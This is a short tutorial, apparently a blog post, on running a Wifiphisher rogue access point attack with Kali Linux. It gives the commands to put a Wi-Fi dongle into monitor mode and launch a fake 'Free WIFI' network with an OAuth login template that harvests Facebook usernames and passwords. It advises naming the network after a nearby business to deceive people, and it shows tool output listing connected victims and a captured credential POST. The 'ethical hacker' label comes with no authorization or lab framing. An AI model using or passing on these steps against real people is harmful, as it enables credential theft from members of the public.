Wifiphisher Rogue Access Point Attack
Introduction:
Wifiphisher is a powerful command line tool that ethical hackers can use to create rogue wifi networks and capture sensitive data from unsuspecting users. This tool comes with tons of functionality, for this tutorial I'm going to focus on the rogue network attack in which hackers can create fake wifi access points for users in a public place to connect to and share username/passwords.
Prerequisites:
- Installation of Kali Linux (I run mine on a Raspberry Pi 4)
- Wifi Dongle with Monitor Mode capabilities
Tutorial:
In order to run this attack we will first need to put the attached wifi dongle into monitor mode. To do this first type the following command to list out the attached interfaces:
ifconfig
Typically it will be the one named 'wlan1' as the 'wlan0' is the internal wifi card which isn't capable of monitor mode.
Next run the following commands
ifconfig wlan1 down
iwconfig wlan1 mode monitor
ifconfig wlan1 up
Now that you have a wifi interface with monitor mode enabled you will be able to use that interface with the wifiphisher attack. Run the following command:
wifiphisher -i wlan1 -e "Free WIFI" -p oauth-login
The -i refers to the interface you will use which is the one we set into monitor mode. The -e is used to set the essid of your fake network. In this case we are just going with 'Free WIFI' but depending on the setting you could use the name of the business you are in to trick users into feeling safe. Finally the -p indicates an authentication page template which will pop up on the users screen when they connect to the network. This one we picked will request their facebook username/password to authenticate. Unknowing users will be tricked into handing over their facebook credentials thinking it is being used to authenticate them with the network. It's a simple example, wifiphisher gives users the ability to customize these templates for more sophisticated attacks. The following is what you'll see when a victim connects.First you can see the list of Connected Victims MAC addresses. Then you'll see in the http requests that the user has provided a username and password that can be used to access their account.
Extensions feed: | Wifiphisher 1.4GIT
| ESSID: Free WIFI
| Channel: 6
| AP interface: wlan0
| Options: [Esc] Quit
|_____________________________
Connected Victims:
da:6b:29:73:58:12 10.0.0.53 Unknown iOS/MacOS
HTTP requests:
[*] GET request from 10.0.0.53 for http://fonts.gstatic.com/s/roboto/v15/RxZJdnzeo3R5zSexge8UUaCWcynf_cDxXwCLxiixG1c.ttf
[*] GET request from 10.0.0.53 for http://fonts.gstatic.com/s/roboto/v15/d-6IYplOFocCacKzxwXSOKCWcynf_cDxXwCLxiixG1c.ttf
[*] GET request from 10.0.0.53 for http://fonts.gstatic.com/s/roboto/v15/mnpfi9pxYH-Go5UiibESIqCWcynf_cDxXwCLxiixG1c.ttf
[*] POST request from 10.0.0.53 with wfphshr-username=Test@test.com&wfphshr-password=password
[*] GET request from 10.0.0.53 for http://captive.apple.com/hotspot-detect.html
Conclusion:
Wifiphisher is a powerful tool that any ethical hacker should be comfortable dispatching from their tool belt. Read more about it's additional capabilities here.